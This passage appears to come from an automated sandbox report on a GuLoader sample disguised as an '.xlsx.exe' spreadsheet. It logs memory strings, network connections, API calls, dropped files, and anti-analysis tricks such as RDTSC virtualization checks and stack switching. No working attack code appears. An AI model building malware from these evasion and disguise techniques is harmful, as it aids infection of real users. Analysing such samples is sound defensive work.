00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.00000000074AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3352640327.00000000074AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;repor
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731139165.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.00000000074AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50029 version: TLS 1.2

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405331

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040335A
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		2_2_0040335A

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_00404B6E	0_2_00404B6E
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_0040659D	0_2_0040659D
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_00404B6E	2_2_00404B6E
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_0040659D	2_2_0040659D

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: String function: 00402B3A appears 49 times

Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
Source: 09-FD-94.03.60.175.07.xlsx.exe	Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe

Source: 09-FD-94.03.60.175.07.xlsx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal76.troj.evad.winEXE@3/10@2/2

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,

0_2_00404635

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,

0_2_0040206A

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File created: C:\Users\user\subacidity.lnk

Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\nsaD100.tmp

Jump to behavior

Source: 09-FD-94.03.60.175.07.xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 09-FD-94.03.60.175.07.xlsx.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File read: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"	Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: subacidity.lnk.0.dr

LNK file: ..\..\Program Files (x86)\Common Files\cutline.sil

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: 09-FD-94.03.60.175.07.xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2290371684.0000000007D83000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4016458454.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062B2

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_10002DE0 push eax; ret

0_2_10002E0E

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	API/Special instruction interceptor: Address: 7F0F3C6
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	API/Special instruction interceptor: Address: 4BCF3C6

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	RDTSC instruction interceptor: First address: 7ECFC59 second address: 7ECFC59 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 0BE15CA1h 0x00000008 test dh, ah 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F7410DC3A30h 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ah, bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	RDTSC instruction interceptor: First address: 4B8FC59 second address: 4B8FC59 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 0BE15CA1h 0x00000008 test dh, ah 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F7410D9D310h 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ah, bh 0x00000012 rdtsc

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe TID: 6528

Thread sleep time: -90000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_004057D0
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_0040628B FindFirstFileW,FindClose,	0_2_0040628B
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_00402770 FindFirstFileW,	2_2_00402770
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	2_2_004057D0
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_0040628B FindFirstFileW,FindClose,	2_2_0040628B

